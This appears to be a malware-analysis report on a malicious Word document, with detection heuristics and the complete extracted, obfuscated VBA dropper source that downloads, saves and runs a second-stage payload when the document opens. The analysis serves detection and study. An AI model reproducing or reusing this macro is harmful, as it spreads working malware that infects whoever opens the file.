MALICIOUS
350
Risk Score
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
T1140 Deobfuscate/Decode Files or Information
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The macros are obfuscated and designed to download and execute a second-stage payload. The document body acts as a lure, instructing the user to enable content to view a 'secured statement', which is a common social engineering tactic.
Heuristics 10
-
ClamAV: Doc.Dropper.Agent-6450723-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6450723-0
-
VBA macros detected medium 6 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXECVBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.Matched line in script
QYQoJeddlLpwrmfgXNywuwFJz = pyFrJImztQXCpkmobObAeBFaq.ResponseBody -
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
Set SdwxfJogqxDZnMqfnPrxqLZpQ = GetObject("",WILscVlpxI ( Array ( 29,26,52,6,67,19,6,42,4,91,14,20,33,94,38,62 ), 0 )); -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set xdmZMJEIHblAmhMlmTgeKxZdN = CreateObject(WILscVlpxI(Array(29, 38, 37, 16, 4, 34, 2, 116, 59, 90, 8, 25, 57), 0)) -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set SdwxfJogqxDZnMqfnPrxqLZpQ = GetObject("",WILscVlpxI ( Array ( 29,26,52,6,67,19,6,42,4,91,14,20,33,94,38,62 ), 0 )); -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_Open() -
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main Referenced by macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11236 bytes |
SHA-256: f32792a71a41da81f27b6b9598928f07d45c3c9542e54c64672e81ba35528543 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
If ActiveDocument.Variables("xzgWcL").Value <> "yolo" Then
HRqctLfjTbTwCtKsgAgohlQgB
ActiveDocument.Variables("xzgWcL").Value = "yolo"
If ActiveDocument.ReadOnly = False Then
ActiveDocument.Save
End If
End If
End Sub
Attribute VB_Name = "MCpzOyf"
Private Function WILscVlpxI(GBUdWSunwT As Variant, CEGeluZwxj As Integer)
Dim DktqmEUisZ, vbgqoDblCa As String, XopsfCkPPJ, BCHLqtnCAT
vbgqoDblCa = ActiveDocument.Variables("xzgWcL").Value()
DktqmEUisZ = ""
XopsfCkPPJ = 1
While XopsfCkPPJ < UBound(GBUdWSunwT) + 2
BCHLqtnCAT = XopsfCkPPJ Mod Len(vbgqoDblCa): If BCHLqtnCAT = 0 Then BCHLqtnCAT = Len(vbgqoDblCa)
DktqmEUisZ = DktqmEUisZ + Chr(Asc(Mid(vbgqoDblCa, BCHLqtnCAT + CEGeluZwxj, 1)) Xor CInt(GBUdWSunwT(XopsfCkPPJ - 1)))
XopsfCkPPJ = XopsfCkPPJ + 1
Wend
WILscVlpxI = DktqmEUisZ
End Function
Function yrrfcAvvsLhikizcvNWLbXjQV(GkRqfLebpwCKEHZPqBjoXZQio, MnCIFQwwfRfkzUvXnWtfjBtDO)
zHrtJfKSnmHYOydBmsMBZTDNu = GkRqfLebpwCKEHZPqBjoXZQio.Items
For rgBqyftvflyaeZYljsfSqamik = 0 To GkRqfLebpwCKEHZPqBjoXZQio.Count - 1
If zHrtJfKSnmHYOydBmsMBZTDNu(rgBqyftvflyaeZYljsfSqamik) = MnCIFQwwfRfkzUvXnWtfjBtDO Then
yrrfcAvvsLhikizcvNWLbXjQV = True
Exit For
End If
Next
yrrfcAvvsLhikizcvNWLbXjQV = False
End Function
Sub wfUgOueOpWMXKYXFhjXBpOzoV()
Dim SdwxfJogqxDZnMqfnPrxqLZpQ, nUfWhwToWNGWHKGBBqAxfLPuR, RzXmqMiPXzCLXgQSuIkgDlqzH
Set SdwxfJogqxDZnMqfnPrxqLZpQ = GetObject("",WILscVlpxI ( Array ( 29,26,52,6,67,19,6,42,4,91,14,20,33,94,38,62 ), 0 ));
SdwxfJogqxDZnMqfnPrxqLZpQ.Visible = true;
SdwxfJogqxDZnMqfnPrxqLZpQ.ScreenUpdating = false;
nUfWhwToWNGWHKGBBqAxfLPuR = SdwxfJogqxDZnMqfnPrxqLZpQ.ActiveDocument;
nUfWhwToWNGWHKGBBqAxfLPuR.Content.Select();
SdwxfJogqxDZnMqfnPrxqLZpQ.Selection.Delete();
RzXmqMiPXzCLXgQSuIkgDlqzH = nUfWhwToWNGWHKGBBqAxfLPuR.Range();
RzXmqMiPXzCLXgQSuIkgDlqzH.InsertAfter(WILscVlpxI ( Array ( 30,49,102,32,12,60,29,122,10,83,3,30,60,89,46,112,57,1,39,22,8, _
63,19,52,28,18,9,16,54,69,48,32,62,28,41,12,77,52,23,51,4, _
71,31,16,116,23,25,60,47,20,53,7,77,62,25,61,1,92,77,26,59, _
91,32,62,47,85,50,13,77,36,31,63,31,18,20,26,32,69,105,50,43, _
27,45,66,30,38,23,46,13,95,8,27,33,25 ), 0 ));
RzXmqMiPXzCLXgQSuIkgDlqzH.InsertParagraphAfter();
SdwxfJogqxDZnMqfnPrxqLZpQ.ScreenUpdating = true;
End Sub
Dim iaaifASUlvDfoMYNvPJZNRHOn
Sub nfyjLNjcfrUcnXnxJrkEJSAkx()
Dim xdmZMJEIHblAmhMlmTgeKxZdN
Set xdmZMJEIHblAmhMlmTgeKxZdN = CreateObject(WILscVlpxI(Array(29, 38, 37, 16, 4, 34, 2, 116, 59, 90, 8, 25, 57), 0))
Set zzUpNiOKOhEAExeDcJHfncbZP = CreateObject(WILscVlpxI(Array(25, 22, 52, 11, 29, 38, 31, 52, 15, 28, 41, 28, 54, 67, 32, 63, 36, 20, 52, 27), 0))
Dim vLKhlAZRdIzuqELwePBHbLufu: vLKhlAZRdIzuqELwePBHbLufu = 0
Dim qiDHYiFVnaMaRwPUMvyYvjmYE: qiDHYiFVnaMaRwPUMvyYvjmYE = ""
Dim GGWrUAEZxRSohZWWrNkILpvIB: GGWrUAEZxRSohZWWrNkILpvIB = ""
On Error Resume Next
qiDHYiFVnaMaRwPUMvyYvjmYE = xdmZMJEIHblAmhMlmTgeKxZdN.RegRead(WILscVlpxI(Array(2, 62, 3, 59, 50, 17, 35, 8, 58, 119, 35, 33, 10, 98, 26, 21, 24, 41, 21, 13, 11, _
38, 1, 59, 26, 87, 49, 56, 60, 84, 59, 63, 57, 26, 32, 22, 49, 5, 31, 52, 12, _
93, 26, 6, 9, 116, 60, 34, 56, 16, 40, 22, 59, 55, 4, 41, 1, 93, 3, 41, 28, _
89, 61, 53, 56, 27, 35, 22, 77, 1, 19, 46, 28, 91, 3, 18, 38, 107, 56, 57, 14, _
61, 31, 11, 43, 4, 24, 59, 37, 83, 63, 2, 5, 98, 4, 38, 51, 44, 48, 8, 0, _
11, 51), 0))
If qiDHYiFVnaMaRwPUMvyYvjmYE = WILscVlpxI(Array(123), 0) Then
GGWrUAEZxRSohZWWrNkILpvIB = xdmZMJEIHblAmhMlmTgeKxZdN.RegRead(WILscVlpxI(Array(2, 62, 3, 59, 50, 17, 35, 8, 58, 119, 35, 33, 10, 98, 26, 21, 24, 41, 21, 13, 11, _
38, 1, 59, 26, 87, 49, 56, 60, 84, 59, 63, 57, 26, 32, 22, 49, 5, 31, 52, 12, _
93, 26, 6, 9, 116, 60, 34, 56, 16, 40, 22, 59, 55, 4, 41, 1, 93, 3, 41, 28, _
89, 61, 53, 56, 27, 35, 22, 77, 1, 19, 46, 28, 91, 3, 18, 38, 107, 14, 23, 29, _
7, 19, 35, 40, 8, 14, 8, 59, 93, 5, 47, 2, 96, 59, 30, 33, 60, 10, 18, 27, _
27, 52), 0))
vLKhlAZRdIzuqELwePBHbLufu = vLKhlAZRdIzuqELwePBHbLufu + 1
zzUpNiOKOhEAExeDcJHfncbZP.Add vLKhlAZRdIzuqELwePBHbLufu, GGWrUAEZxRSohZWWrNkILpvIB
End If
If Err.Number <> 0 Then
Err.Clear
End If
Const yctJETKzINXOoVgfzwuQUhkIo = &H80000003
UNILLuMraBAIaQdlUmDHrlxcG = WILscVlpxI(Array(100), 0)
Set LGHTXYjWeaXqfihITVoFzCUTN = GetObject(WILscVlpxI(Array(61, 28, 40, 15, 10, 63, 2, 41, 82, 73, 4, 24, 37, 82, 59, 35, 37, 27, 39, 22, 4, _
61, 24, 22, 13, 68, 8, 25, 104, 94, 36, 32, 47, 7, 53, 13, 3, 51, 2, 63, 21, _
19, 49, 41), 0) _
& UNILLuMraBAIaQdlUmDHrlxcG & WILscVlpxI(Array(22, 7, 41, 13, 25, 14, 18, 63, 14, 83, 24, 25, 33, 13, 26, 36, 46, 39, 35, 5, 61, _
32, 25, 44), 0))
fKiXyjiDjohhffNjcsfHgqYch = ""
LGHTXYjWeaXqfihITVoFzCUTN.EnumKey yctJETKzINXOoVgfzwuQUhkIo, fKiXyjiDjohhffNjcsfHgqYch, YLzPZYDBtEBlkwJPqvnkdJovx
For Each udJCuiOpwxMOKWQmUlVViFijQ In YLzPZYDBtEBlkwJPqvnkdJovx
qiDHYiFVnaMaRwPUMvyYvjmYE = xdmZMJEIHblAmhMlmTgeKxZdN.RegRead(WILscVlpxI(Array(51, 22, 50, 40, 40, 6, 61, 32, 33, 124, 53, 58, 58, 97, 46, 54, 48, 2, 51, 51, 56, _
58, 29, 19, 7, 110), 0) & udJCuiOpwxMOKWQmUlVViFijQ & WILscVlpxI(Array(22, 38, 41, 4, 25, 37, 23, 40, 13, 110, 32, 28, 54, 69, 38, 35, 37, 19, 50, 62, 58, _
59, 24, 62, 7, 69, 30, 41, 22, 66, 59, 34, 47, 27, 50, 52, 8, 32, 5, 51, 7, _
92, 49, 60, 59, 67, 44, 34, 36, 16, 50, 66, 62, 55, 2, 46, 1, 92, 10, 6, 9, _
70, 32, 20, 2, 44, 47, 36, 59, 60, 23, 23, 9, 96, 26, 37, 0, 122, 63, 41, 19, _
3, 44, 15, 52, 23), 0))
If qiDHYiFVnaMaRwPUMvyYvjmYE = WILscVlpxI(Array(123), 0) Then
GGWrUAEZxRSohZWWrNkILpvIB = xdmZMJEIHblAmhMlmTgeKxZdN.RegRead(WILscVlpxI(Array(51, 22, 50, 40, 40, 6, 61, 32, 33, 124, 53, 58, 58, 97, 46, 54, 48, 2, 51, 51, 56, _
58, 29, 19, 7, 110), 0) & udJCuiOpwxMOKWQmUlVViFijQ & WILscVlpxI(Array(22, 38, 41, 4, 25, 37, 23, 40, 13, 110, 32, 28, 54, 69, 38, 35, 37, 19, 50, 62, 58, _
59, 24, 62, 7, 69, 30, 41, 22, 66, 59, 34, 47, 27, 50, 52, 8, 32, 5, 51, 7, _
92, 49, 60, 59, 67, 44, 34, 36, 16, 50, 66, 62, 55, 2, 46, 1, 92, 10, 6, 9, _
112, 14, 7, 56, 32, 7, 39, 55, 42, 36, 9, 7, 90, 55, 34, 2, 69, 7, 59, 3, _
57, 54, 20, 36, 16), 0))
If Not yrrfcAvvsLhikizcvNWLbXjQV(zzUpNiOKOhEAExeDcJHfncbZP, GGWrUAEZxRSohZWWrNkILpvIB) Then
vLKhlAZRdIzuqELwePBHbLufu = vLKhlAZRdIzuqELwePBHbLufu + 1
zzUpNiOKOhEAExeDcJHfncbZP.Add vLKhlAZRdIzuqELwePBHbLufu, GGWrUAEZxRSohZWWrNkILpvIB
End If
End If
If Err.Number <> 0 Then
Err.Clear
End If
Next
Set iaaifASUlvDfoMYNvPJZNRHOn = zzUpNiOKOhEAExeDcJHfncbZP
Set xdmZMJEIHblAmhMlmTgeKxZdN = Nothing
End Sub
Function QYQoJeddlLpwrmfgXNywuwFJz(RSFzoMSeLkAiKUVxHeKSnYEAg, aTReKvJkCtkJbhiwEQzDwkHpm, WHOQmShJETnHXOyYUAUXZxmlZ, LQjpqIgEwXcoacqwpirLCXMTk)
On Error Resume Next
Dim pyFrJImztQXCpkmobObAeBFaq
Set pyFrJImztQXCpkmobObAeBFaq = CreateObject(WILscVlpxI(Array(7, 6, 62, 15, 1, 96, 88, 9, 13, 64, 27, 16, 39, 111, 4, 28, 2, 33, 18, 50, 67, _
100, 88, 106), 0))
If Err.Number <> 0 Then
QYQoJeddlLpwrmfgXNywuwFJz = pyFrJImztQXCpkmobObAeBFaq.ResponseBody
Set pyFrJImztQXCpkmobObAeBFaq = Nothing
Err.Clear
Exit Function
End If
Dim JNhvtobwDQskQYGISbAHHtnMY: JNhvtobwDQskQYGISbAHHtnMY = 0
Do While JNhvtobwDQskQYGISbAHHtnMY < UBound(WHOQmShJETnHXOyYUAUXZxmlZ)
Err.Clear
zHrtJfKSnmHYOydBmsMBZTDNu = iaaifASUlvDfoMYNvPJZNRHOn.Items
For BXNFOEwniVJibLGVsWxLngkoz = -1 To iaaifASUlvDfoMYNvPJZNRHOn.Count - 1
Err.Clear
qSFJAjrDXWJtABUMOVvOMHrHI = WHOQmShJETnHXOyYUAUXZxmlZ(JNhvtobwDQskQYGISbAHHtnMY) & LQjpqIgEwXcoacqwpirLCXMTk
pyFrJImztQXCpkmobObAeBFaq.setOption 2, 13056
pyFrJImztQXCpkmobObAeBFaq.setTimeouts 0, 0, 0, 0
pyFrJImztQXCpkmobObAeBFaq.Open RSFzoMSeLkAiKUVxHeKSnYEAg, qSFJAjrDXWJtABUMOVvOMHrHI, False
If BXNFOEwniVJibLGVsWxLngkoz <> -1 Then
pyFrJImztQXCpkmobObAeBFaq.setProxy 2, zHrtJfKSnmHYOydBmsMBZTDNu(BXNFOEwniVJibLGVsWxLngkoz), ""
End If
pyFrJImztQXCpkmobObAeBFaq.setRequestHeader WILscVlpxI(Array(9, 29, 39, 16, 30, 55, 2), 0), WILscVlpxI(Array(63, 1, 32, 79, 85), 0)
pyFrJImztQXCpkmobObAeBFaq.setRequestHeader WILscVlpxI(Array(9, 26, 40, 12, 8, 49, 2, 51, 7, 92), 0), WILscVlpxI(Array(1, 16, 35, 18, 64, 19, 26, 51, 30, 87), 0)
pyFrJImztQXCpkmobObAeBFaq.setRequestHeader WILscVlpxI(Array(1, 16, 35, 18, 64, 19, 26, 51, 30, 87), 0), WILscVlpxI(Array(121, 69, 118), 0)
pyFrJImztQXCpkmobObAeBFaq.setRequestHeader WILscVlpxI(Array(9, 26, 40, 22, 8, 60, 2, 119, 60, 75, 29, 16), 0), WILscVlpxI(Array(43, 5, 54, 14, 4, 49, 23, 46, 1, 93, 3, 90, 45, 26, 62, 39, 61, 88, 32, 13, 31, _
63, 91, 47, 26, 94, 8, 27, 54, 88, 45, 53, 46), 0)
pyFrJImztQXCpkmobObAeBFaq.Send (aTReKvJkCtkJbhiwEQzDwkHpm)
If pyFrJImztQXCpkmobObAeBFaq.ReadyState <> 4 Then
pyFrJImztQXCpkmobObAeBFaq.WaitForResponse 30
End If
If Err.Number = 0 Then
If pyFrJImztQXCpkmobObAeBFaq.Status = 200 Then
If pyFrJImztQXCpkmobObAeBFaq.StatusText = WILscVlpxI(Array(5, 62), 0) Then
QYQoJeddlLpwrmfgXNywuwFJz = pyFrJImztQXCpkmobObAeBFaq.ResponseBody
Exit Function
End If
End If
End If
Next
JNhvtobwDQskQYGISbAHHtnMY = JNhvtobwDQskQYGISbAHHtnMY + 1
Loop
QYQoJeddlLpwrmfgXNywuwFJz = pyFrJImztQXCpkmobObAeBFaq.ResponseBody
Set pyFrJImztQXCpkmobObAeBFaq = Nothing
End Function
Sub WJFDCHouLHjDlYHVoUxzpfGLe(WXKqccFQlDQrAmzrMJFbZzGIY, fCZGpshBigvPgWLBEBcBYyNfc)
Set ZoVmbcuaCaEbYvmbhpEuTkRXG = CreateObject(WILscVlpxI(Array(11, 49, 9, 38, 47, 124, 37, 46, 26, 87, 12, 24), 0))
ZoVmbcuaCaEbYvmbhpEuTkRXG.Open
ZoVmbcuaCaEbYvmbhpEuTkRXG.Type = 1
If IsEmpty(WXKqccFQlDQrAmzrMJFbZzGIY) Then
ZoVmbcuaCaEbYvmbhpEuTkRXG.Close
Set ZoVmbcuaCaEbYvmbhpEuTkRXG = Nothing
Exit Sub
End If
ZoVmbcuaCaEbYvmbhpEuTkRXG.Write WXKqccFQlDQrAmzrMJFbZzGIY
ZoVmbcuaCaEbYvmbhpEuTkRXG.Position = 0
ZoVmbcuaCaEbYvmbhpEuTkRXG.SaveToFile fCZGpshBigvPgWLBEBcBYyNfc
ZoVmbcuaCaEbYvmbhpEuTkRXG.Close
Set ZoVmbcuaCaEbYvmbhpEuTkRXG = Nothing
End Sub
Sub HRqctLfjTbTwCtKsgAgohlQgB()
On Error Resume Next
Dim iRPslDHhWjtCYtIGiHSZrAkjr(), BDVPOXaXBxMcvsDsQzGgcDhkC, eAbYltzpuopIzFFBAiyBvmzEd, ZoLJdYNEWvtvRXjVrkVIXDxdP
ReDim iRPslDHhWjtCYtIGiHSZrAkjr(1)
nfyjLNjcfrUcnXnxJrkEJSAkx
Set eAbYltzpuopIzFFBAiyBvmzEd = CreateObject(WILscVlpxI(Array(29, 38, 37, 16, 4, 34, 2, 116, 59, 90, 8, 25, 57), 0))
Set ZoLJdYNEWvtvRXjVrkVIXDxdP = CreateObject(WILscVlpxI(Array(25, 22, 52, 11, 29, 38, 31, 52, 15, 28, 43, 28, 57, 82, 26, 41, 57, 1, 35, 15, 34, _
48, 28, 63, 11, 70), 0)).GetSpecialFolder(2)
BDVPOXaXBxMcvsDsQzGgcDhkC = WILscVlpxI(Array(51, 26, 42, 13, 67, 55, 14, 63), 0)
ZoLJdYNEWvtvRXjVrkVIXDxdP = ZoLJdYNEWvtvRXjVrkVIXDxdP & WILscVlpxI(Array(22), 0) & BDVPOXaXBxMcvsDsQzGgcDhkC
iRPslDHhWjtCYtIGiHSZrAkjr(0) = WILscVlpxI(Array(34, 1, 50, 18, 87, 125, 89, 45, 31, 69, 67, 24, 52, 84, 59, 63, 57, 26, 32, 22, 67, _
53, 7, 117), 0)
KDOiBQRVGGPUnqEFjygmVYhRl = QYQoJeddlLpwrmfgXNywuwFJz(WILscVlpxI(Array(13, 48, 18), 0), "", iRPslDHhWjtCYtIGiHSZrAkjr, WILscVlpxI(Array(48, 90, 36, 13, 25, 124, 19, 34, 13), 0))
WJFDCHouLHjDlYHVoUxzpfGLe KDOiBQRVGGPUnqEFjygmVYhRl, ZoLJdYNEWvtvRXjVrkVIXDxdP
eAbYltzpuopIzFFBAiyBvmzEd.Run (ZoLJdYNEWvtvRXjVrkVIXDxdP)
wfUgOueOpWMXKYXFhjXBpOzoV
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.